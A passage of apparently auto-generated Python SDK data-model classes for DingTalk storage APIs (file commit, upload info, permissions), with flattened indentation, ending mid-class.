class AddPermissionRequest(TeaModel):
def __init__(
self,
members: List[AddPermissionRequestMembers] = None,
option: AddPermissionRequestOption = None,
role_id: str = None,
union_id: str = None,
):
self.members = members
self.option = option
self.role_id = role_id
self.union_id = union_id
def validate(self):
if self.members:
for k in self.members:
if k:
k.validate()
if self.option:
self.option.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
result['members'] = []
if self.members is not None:
for k in self.members:
result['members'].append(k.to_map() if k else None)
if self.option is not None:
result['option'] = self.option.to_map()
if self.role_id is not None:
result['roleId'] = self.role_id
if self.union_id is not None:
result['unionId'] = self.union_id
return result
def from_map(self, m: dict = None):
m = m or dict()
self.members = []
if m.get('members') is not None:
for k in m.get('members'):
temp_model = AddPermissionRequestMembers()
self.members.append(temp_model.from_map(k))
if m.get('option') is not None:
temp_model = AddPermissionRequestOption()
self.option = temp_model.from_map(m['option'])
if m.get('roleId') is not None:
self.role_id = m.get('roleId')
if m.get('unionId') is not None:
self.union_id = m.get('unionId')
return self
class AddPermissionResponseBody(TeaModel):
def __init__(
self,
success: bool = None,
):
self.success = success
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.success is not None:
result['success'] = self.success
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('success') is not None:
self.success = m.get('success')
return self
class AddPermissionResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
status_code: int = None,
body: AddPermissionResponseBody = None,
):
self.headers = headers
self.status_code = status_code
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.status_code, 'status_code')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.status_code is not None:
result['statusCode'] = self.status_code
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('statusCode') is not None:
self.status_code = m.get('statusCode')
if m.get('body') is not None:
temp_model = AddPermissionResponseBody()
self.body = temp_model.from_map(m['body'])
return self
class CommitFileHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class CommitFileRequestOptionAppProperties(TeaModel):
def __init__(
self,
name: str = None,
value: str = None,
visibility: str = None,
):
self.name = name
self.value = value
self.visibility = visibility
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.name is not None:
result['name'] = self.name
if self.value is not None:
result['value'] = self.value
if self.visibility is not None:
result['visibility'] = self.visibility
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('name') is not None:
self.name = m.get('name')
if m.get('value') is not None:
self.value = m.get('value')
if m.get('visibility') is not None:
self.visibility = m.get('visibility')
return self
class CommitFileRequestOption(TeaModel):
def __init__(
self,
app_properties: List[CommitFileRequestOptionAppProperties] = None,
conflict_strategy: str = None,
convert_to_online_doc: bool = None,
convert_to_online_doc_target_document_type: str = None,
size: int = None,
):
self.app_properties = app_properties
self.conflict_strategy = conflict_strategy
self.convert_to_online_doc = convert_to_online_doc
self.convert_to_online_doc_target_document_type = convert_to_online_doc_target_document_type
self.size = size
def validate(self):
if self.app_properties:
for k in self.app_properties:
if k:
k.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
result['appProperties'] = []
if self.app_properties is not None:
for k in self.app_properties:
result['appProperties'].append(k.to_map() if k else None)
if self.conflict_strategy is not None:
result['conflictStrategy'] = self.conflict_strategy
if self.convert_to_online_doc is not None:
result['convertToOnlineDoc'] = self.convert_to_online_doc
if self.convert_to_online_doc_target_document_type is not None:
result['convertToOnlineDocTargetDocumentType'] = self.convert_to_online_doc_target_document_type
if self.size is not None:
result['size'] = self.size
return result
def from_map(self, m: dict = None):
m = m or dict()
self.app_properties = []
if m.get('appProperties') is not None:
for k in m.get('appProperties'):
temp_model = CommitFileRequestOptionAppProperties()
self.app_properties.append(temp_model.from_map(k))
if m.get('conflictStrategy') is not None:
self.conflict_strategy = m.get('conflictStrategy')
if m.get('convertToOnlineDoc') is not None:
self.convert_to_online_doc = m.get('convertToOnlineDoc')
if m.get('convertToOnlineDocTargetDocumentType') is not None:
self.convert_to_online_doc_target_document_type = m.get('convertToOnlineDocTargetDocumentType')
if m.get('size') is not None:
self.size = m.get('size')
return self
class CommitFileRequest(TeaModel):
def __init__(
self,
name: str = None,
option: CommitFileRequestOption = None,
upload_key: str = None,
union_id: str = None,
):
self.name = name
self.option = option
self.upload_key = upload_key
self.union_id = union_id
def validate(self):
if self.option:
self.option.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.name is not None:
result['name'] = self.name
if self.option is not None:
result['option'] = self.option.to_map()
if self.upload_key is not None:
result['uploadKey'] = self.upload_key
if self.union_id is not None:
result['unionId'] = self.union_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('name') is not None:
self.name = m.get('name')
if m.get('option') is not None:
temp_model = CommitFileRequestOption()
self.option = temp_model.from_map(m['option'])
if m.get('uploadKey') is not None:
self.upload_key = m.get('uploadKey')
if m.get('unionId') is not None:
self.union_id = m.get('unionId')
return self
class CommitFileResponseBodyDentryProperties(TeaModel):
def __init__(
self,
read_only: bool = None,
):
self.read_only = read_only
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.read_only is not None:
result['readOnly'] = self.read_only
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('readOnly') is not None:
self.read_only = m.get('readOnly')
return self
class CommitFileResponseBodyDentryThumbnail(TeaModel):
def __init__(
self,
height: int = None,
url: str = None,
width: int = None,
):
self.height = height
self.url = url
self.width = width
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.height is not None:
result['height'] = self.height
if self.url is not None:
result['url'] = self.url
if self.width is not None:
result['width'] = self.width
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('height') is not None:
self.height = m.get('height')
if m.get('url') is not None:
self.url = m.get('url')
if m.get('width') is not None:
self.width = m.get('width')
return self
class CommitFileResponseBodyDentry(TeaModel):
def __init__(
self,
app_properties: Dict[str, List[DentryAppPropertiesValue]] = None,
category: str = None,
create_time: str = None,
creator_id: str = None,
extension: str = None,
id: str = None,
modified_time: str = None,
modifier_id: str = None,
name: str = None,
parent_id: str = None,
partition_type: str = None,
path: str = None,
properties: CommitFileResponseBodyDentryProperties = None,
size: int = None,
space_id: str = None,
status: str = None,
storage_driver: str = None,
thumbnail: CommitFileResponseBodyDentryThumbnail = None,
type: str = None,
uuid: str = None,
version: int = None,
):
self.app_properties = app_properties
self.category = category
self.create_time = create_time
self.creator_id = creator_id
self.extension = extension
self.id = id
self.modified_time = modified_time
self.modifier_id = modifier_id
self.name = name
self.parent_id = parent_id
self.partition_type = partition_type
self.path = path
self.properties = properties
self.size = size
self.space_id = space_id
self.status = status
self.storage_driver = storage_driver
self.thumbnail = thumbnail
self.type = type
self.uuid = uuid
self.version = version
def validate(self):
if self.app_properties:
for v in self.app_properties.values():
for k1 in v:
if k1:
k1.validate()
if self.properties:
self.properties.validate()
if self.thumbnail:
self.thumbnail.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
result['appProperties'] = {}
if self.app_properties is not None:
for k, v in self.app_properties.items():
l1 = []
for k1 in v:
l1.append(k1.to_map() if k1 else None)
result['appProperties'][k] = l1
if self.category is not None:
result['category'] = self.category
if self.create_time is not None:
result['createTime'] = self.create_time
if self.creator_id is not None:
result['creatorId'] = self.creator_id
if self.extension is not None:
result['extension'] = self.extension
if self.id is not None:
result['id'] = self.id
if self.modified_time is not None:
result['modifiedTime'] = self.modified_time
if self.modifier_id is not None:
result['modifierId'] = self.modifier_id
if self.name is not None:
result['name'] = self.name
if self.parent_id is not None:
result['parentId'] = self.parent_id
if self.partition_type is not None:
result['partitionType'] = self.partition_type
if self.path is not None:
result['path'] = self.path
if self.properties is not None:
result['properties'] = self.properties.to_map()
if self.size is not None:
result['size'] = self.size
if self.space_id is not None:
result['spaceId'] = self.space_id
if self.status is not None:
result['status'] = self.status
if self.storage_driver is not None:
result['storageDriver'] = self.storage_driver
if self.thumbnail is not None:
result['thumbnail'] = self.thumbnail.to_map()
if self.type is not None:
result['type'] = self.type
if self.uuid is not None:
result['uuid'] = self.uuid
if self.version is not None:
result['version'] = self.version
return result
def from_map(self, m: dict = None):
m = m or dict()
self.app_properties = {}
if m.get('appProperties') is not None:
for k, v in m.get('appProperties').items():
l1 = []
for k1 in v:
temp_model = DentryAppPropertiesValue()
l1.append(temp_model.from_map(k1))
self.app_properties['k'] = l1
if m.get('category') is not None:
self.category = m.get('category')
if m.get('createTime') is not None:
self.create_time = m.get('createTime')
if m.get('creatorId') is not None:
self.creator_id = m.get('creatorId')
if m.get('extension') is not None:
self.extension = m.get('extension')
if m.get('id') is not None:
self.id = m.get('id')
if m.get('modifiedTime') is not None:
self.modified_time = m.get('modifiedTime')
if m.get('modifierId') is not None:
self.modifier_id = m.get('modifierId')
if m.get('name') is not None:
self.name = m.get('name')
if m.get('parentId') is not None:
self.parent_id = m.get('parentId')
if m.get('partitionType') is not None:
self.partition_type = m.get('partitionType')
if m.get('path') is not None:
self.path = m.get('path')
if m.get('properties') is not None:
temp_model = CommitFileResponseBodyDentryProperties()
self.properties = temp_model.from_map(m['properties'])
if m.get('size') is not None:
self.size = m.get('size')
if m.get('spaceId') is not None:
self.space_id = m.get('spaceId')
if m.get('status') is not None:
self.status = m.get('status')
if m.get('storageDriver') is not None:
self.storage_driver = m.get('storageDriver')
if m.get('thumbnail') is not None:
temp_model = CommitFileResponseBodyDentryThumbnail()
self.thumbnail = temp_model.from_map(m['thumbnail'])
if m.get('type') is not None:
self.type = m.get('type')
if m.get('uuid') is not None:
self.uuid = m.get('uuid')
if m.get('version') is not None:
self.version = m.get('version')
return self
class CommitFileResponseBody(TeaModel):
def __init__(
self,
dentry: CommitFileResponseBodyDentry = None,
):
self.dentry = dentry
def validate(self):
if self.dentry:
self.dentry.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.dentry is not None:
result['dentry'] = self.dentry.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('dentry') is not None:
temp_model = CommitFileResponseBodyDentry()
self.dentry = temp_model.from_map(m['dentry'])
return self
class CommitFileResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
status_code: int = None,
body: CommitFileResponseBody = None,
):
self.headers = headers
self.status_code = status_code
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.status_code, 'status_code')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.status_code is not None:
result['statusCode'] = self.status_code
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('statusCode') is not None:
self.status_code = m.get('statusCode')
if m.get('body') is not None:
temp_model = CommitFileResponseBody()
self.body = temp_model.from_map(m['body'])
return self
class DeletePermissionHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class DeletePermissionRequestMembers(TeaModel):
def __init__(
self,
corp_id: str = None,
id: str = None,
type: str = None,
):
self.corp_id = corp_id
self.id = id
self.type = type
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.corp_id is not None:
result['corpId'] = self.corp_id
if self.id is not None:
result['id'] = self.id
if self.type is not None:
result['type'] = self.type
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('corpId') is not None:
self.corp_id = m.get('corpId')
if m.get('id') is not None:
self.id = m.get('id')
if m.get('type') is not None:
self.type = m.get('type')
return self
class DeletePermissionRequest(TeaModel):
def __init__(
self,
members: List[DeletePermissionRequestMembers] = None,
role_id: str = None,
union_id: str = None,
):
self.members = members
self.role_id = role_id
self.union_id = union_id
def validate(self):
if self.members:
for k in self.members:
if k:
k.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
result['members'] = []
if self.members is not None:
for k in self.members:
result['members'].append(k.to_map() if k else None)
if self.role_id is not None:
result['roleId'] = self.role_id
if self.union_id is not None:
result['unionId'] = self.union_id
return result
def from_map(self, m: dict = None):
m = m or dict()
self.members = []
if m.get('members') is not None:
for k in m.get('members'):
temp_model = DeletePermissionRequestMembers()
self.members.append(temp_model.from_map(k))
if m.get('roleId') is not None:
self.role_id = m.get('roleId')
if m.get('unionId') is not None:
self.union_id = m.get('unionId')
return self
class DeletePermissionResponseBody(TeaModel):
def __init__(
self,
success: bool = None,
):
self.success = success
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.success is not None:
result['success'] = self.success
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('success') is not None:
self.success = m.get('success')
return self
class DeletePermissionResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
status_code: int = None,
body: DeletePermissionResponseBody = None,
):
self.headers = headers
self.status_code = status_code
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.status_code, 'status_code')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.status_code is not None:
result['statusCode'] = self.status_code
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('statusCode') is not None:
self.status_code = m.get('statusCode')
if m.get('body') is not None:
temp_model = DeletePermissionResponseBody()
self.body = temp_model.from_map(m['body'])
return self
class GetFileUploadInfoHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class GetFileUploadInfoRequestOptionPreCheckParam(TeaModel):
def __init__(
self,
name: str = None,
size: int = None,
):
self.name = name
self.size = size
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.name is not None:
result['name'] = self.name
if self.size is not None:
result['size'] = self.size
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('name') is not None:
self.name = m.get('name')
if m.get('size') is not None:
self.size = m.get('size')
return self
class GetFileUploadInfoRequestOption(TeaModel):
def __init__(
self,
pre_check_param: GetFileUploadInfoRequestOptionPreCheckParam = None,
prefer_intranet: bool = None,
prefer_region: str = None,
storage_driver: str = None,
):
self.pre_check_param = pre_check_param
self.prefer_intranet = prefer_intranet
self.prefer_region = prefer_region
self.storage_driver = storage_driver
def validate(self):
if self.pre_check_param:
self.pre_check_param.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.pre_check_param is not None:
result['preCheckParam'] = self.pre_check_param.to_map()
if self.prefer_intranet is not None:
result['preferIntranet'] = self.prefer_intranet
if self.prefer_region is not None:
result['preferRegion'] = self.prefer_region
if self.storage_driver is not None:
result['storageDriver'] = self.storage_driver
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('preCheckParam') is not None:
temp_model = GetFileUploadInfoRequestOptionPreCheckParam()
self.pre_check_param = temp_model.from_map(m['preCheckParam'])
if m.get('preferIntranet') is not None:
self.prefer_intranet = m.get('preferIntranet')
if m.get('preferRegion') is not None:
self.prefer_region = m.get('preferRegion')
if m.get('storageDriver') is not None:
self.storage_driver = m.get('storageDriver')
return self
class GetFileUploadInfoRequest(TeaModel):
def __init__(
self,
option: GetFileUploadInfoRequestOption = None,
protocol: str = None,
union_id: str = None,
):
self.option = option
self.protocol = protocol
self.union_id = union_id
def validate(self):
if self.option:
self.option.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.option is not None:
result['option'] = self.option.to_map()
if self.protocol is not None:
result['protocol'] = self.protocol
if self.union_id is not None:
result['unionId'] = self.union_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('option') is not None:
temp_model = GetFileUploadInfoRequestOption()
self.option = temp_model.from_map(m['option'])
if m.get('protocol') is not None:
self.protocol = m.get('protocol')
if m.get('unionId') is not None:
self.union_id = m.get('unionId')
return self
class GetFileUploadInfoResponseBodyHeaderSignatureInfo(TeaModel):
def __init__(
self,
expiration_seconds: int = None,
headers: Dict[str, str] = None,
internal_resource_urls: List[str] = None,
region: str = None,
resource_urls: List[str] = None,
):
self.expiration_seconds = expiration_seconds
self.headers = headers
self.internal_resource_urls = internal_resource_urls
self.region = region
self.resource_urls = resource_urls
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.expiration_seconds is not None:
result['expirationSeconds'] = self.expiration_seconds
if self.headers is not None:
result['headers'] = self.headers
if self.internal_resource_urls is not None:
result['internalResourceUrls'] = self.internal_resource_urls
if self.region is not None:
result['region'] = self.region
if self.resource_urls is not None:
result['resourceUrls'] = self.resource_urls
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('expirationSeconds') is not None:
self.expiration_seconds = m.get('expirationSeconds')
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('internalResourceUrls') is not None:
self.internal_resource_urls = m.get('internalResourceUrls')
if m.get('region') is not None:
self.region = m.get('region')
if m.get('resourceUrls') is not None:
self.resource_urls = m.get('resourceUrls')
return self
class GetFileUploadInfoResponseBody(TeaModel):
def __init__(
self,
header_signature_info: GetFileUploadInfoResponseBodyHeaderSignatureInfo = None,
protocol: str = None,
storage_driver: str = None,
upload_key: str = None,
):
self.header_signature_info = header_signature_info
self.protocol = protocol
self.storage_driver = storage_driver
self.upload_key = upload_key
def validate(self):
if self.header_signature_info:
self.header_signature_info.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.header_signature_info is not None:
result['headerSignatureInfo'] = self.header_signature_info.to_map()
if self.protocol is not None:
result['protocol'] = self.protocol
if self.storage_driver is not None:
result['storageDriver'] = self.storage_driver
if self.upload_key is not None:
result['uploadKey'] = self.upload_key
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headerSignatureInfo') is not None:
temp_model = GetFileUploadInfoResponseBodyHeaderSignatureInfo()
self.header_signature_info = temp_model.from_map(m['headerSignatureInfo'])
if m.get('protocol') is not None:
self.protocol = m.get('protocol')
if m.get('storageDriver') is not None:
self.storage_driver = m.get('storageDriver')
if m.get('uploadKey') is not None:
self.upload_key = m.get('uploadKey')
return self
class GetFileUploadInfoResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
status_code: int = None,
body: GetFileUploadInfoResponseBody = None,
):
self.headers = headers
self.status_code = status_code
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.status_code, 'status_code')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.status_code is not None:
result['statusCode'] = self.status_code
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('statusCode') is not None:
self.status_code = m.get('statusCode')
if m.get('body') is not None:
temp_model = GetFileUploadInfoResponseBody()
self.body = temp_model.from_map(m['body'])
return self
class GetPermissionInheritanceHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class GetPermissionInheritanceRequest(TeaModel):
def __init__(
self,
union_id: str = None,
):
self.union_id = union_id
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.union_id is not None:
result['unionId'] = self.union_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('unionId') is not None:
self.union_id = m.get('unionId')
return self
class GetPermissionInheritanceResponseBody(TeaModel):
def __init__(
self,
inheritance: str = None,
):
self.inheritance = inheritance
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.inheritance is not None:
result['inheritance'] = self.inheritance
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('inheritance') is not None:
self.inheritance = m.get('inheritance')
return self
class GetPermissionInheritanceResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
status_code: int = None,
body: GetPermissionInheritanceResponseBody = None,
):
self.headers = headers
self.status_code = status_code
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.status_code, 'status_code')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.status_code is not None:
result['statusCode'] = self.status_code
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('statusCode') is not None:
self.status_code = m.get('statusCode')
if m.get('body') is not None:
temp_model = GetPermissionInheritanceResponseBody()
self.body = temp_model.from_map(m['body'])
return self
class ListPermissionsHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class ListPermissionsRequestOption(TeaModel):
def __init__(
self,
filter_role_ids: List[str] = None,
max_results: int = None,
next_token: str = None,
):
self.filter_role_ids = filter_role_ids
self.max_results = max_results
self.next_token = next_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.filter_role_ids is not None:
result['filterRoleIds'] = self.filter_role_ids
if self.max_results is not None:
result['maxResults'] = self.max_results
if self.next_token is not None:
result['nextToken'] = self.next_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('filterRoleIds') is not None:
self.filter_role_ids = m.get('filterRoleIds')
if m.get('maxResults') is not None:
self.max_results = m.get('maxResults')
if m.get('nextToken') is not None:
self.next_token = m.get('nextToken')
return self
class ListPermissionsRequest(TeaModel):
def __init__(
self,
option: ListPermissionsRequestOption = None,
union_id: str = None,
):
self.option = option
self.union_id = union_id
def validate(self):
if self.option:
self.option.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.option is not None:
result['option'] = self.option.to_map()
if self.union_id is not None:
result['unionId'] = self.union_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('option') is not None:
temp_model = ListPermissionsRequestOption()
self.option = temp_model.from_map(m['option'])
if m.get('unionId') is not None:
self.union_id = m.get('unionId')
return self
class ListPermissionsResponseBodyPermissionsMember(TeaModel):
def __init__(
self,
corp_id: str = None,
id: str = None,
type: str = None,
):
self.corp_id = corp_id
self.id = id
self.type = type
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.corp_id is not None:
result['corpId'] = self.corp_id
if self.id is not None:
result['id'] = self.id
if self.type is not None:
result['type'] = self.type
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('corpId') is not None:
self.corp_id = m.get('corpId')
if m.get('id') is not None:
self.id = m.get('id')
if m.get('type') is not None:
self.type = m.get('type')
return self
class ListPermissionsResponseBodyPermissionsRole(TeaModel):
def __init__(
self,
id: str = None,
name: str = None,
):
self.id = id
self.name = name
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.id is not None:
result['id'] = self.id
if self.name is not None:
result['name'] = self.name
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('id') is not None:
self.id = m.get('id')
if m.get('name') is not None:
self.name = m.get('name')
return self
class ListPermissionsResponseBodyPermissions(TeaModel):
def __init__(
self,
dentry_uuid: str = None,
duration: int = None,
member: ListPermissionsResponseBodyPermissionsMember = None,
role: ListPermissionsResponseBodyPermissionsRole = None,
):
self.dentry_uuid = dentry_uuid
self.duration = duration
self.member = member
self.role = role
def validate(self):
if self.member:
self.member.validate()
if self.role:
self.role.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.dentry_uuid is not None:
result['dentryUuid'] = self.dentry_uuid
if self.duration is not None:
result['duration'] = self.duration
if self.member is not None:
result['member'] = self.member.to_map()
if self.role is not None:
result['role'] = self.role.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('dentryUuid') is not None:
self.dentry_uuid = m.get('dentryUuid')
if m.get('duration') is not None:
self.duration = m.get('duration')
if m.get('member') is not None:
temp_model = ListPermissionsResponseBodyPermissionsMember()
self.member = temp_model.from_map(m['member'])
if m.get('role') is not None:
temp_model = ListPermissionsResponseBodyPermissionsRole()
self.role = temp_model.from_map(m['role'])
return self
class ListPermissionsResponseBody(TeaModel):
def __init__(
self,
next_token: str = None,
permissions: List[ListPermissionsResponseBodyPermissions] = None,
):
self.next_token = next_token
self.permissions = permissions
def validate(self):
if self.permissions:
for k in self.permissions:
if k:
k.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.next_token is not None:
result['nextToken'] = self.next_token
result['permissions'] = []
if self.permissions is not None:
for k in self.permissions:
result['permissions'].append(k.to_map() if k else None)
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('nextToken') is not None:
self.next_token = m.get('nextToken')
self.permissions = []
if m.get('permissions') is not None:
for k in m.get('permissions'):
temp_model = ListPermissionsResponseBodyPermissions()
self.permissions.append(temp_model.from_map(k))
return self
class ListPermissionsResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
status_code: int = None,
body: ListPermissionsResponseBody = None,
):
self.headers = headers
self.status_code = status_code
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.status_code, 'status_code')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.status_code is not None:
result['statusCode'] = self.status_code
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('statusCode') is not None:
self.status_code = m.get('statusCode')
if m.get('body') is not None:
temp_model = ListPermissionsResponseBody()
self.body = temp_model.from_map(m['body'])
return self
class ManagerGetDefaultHandOverUserHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
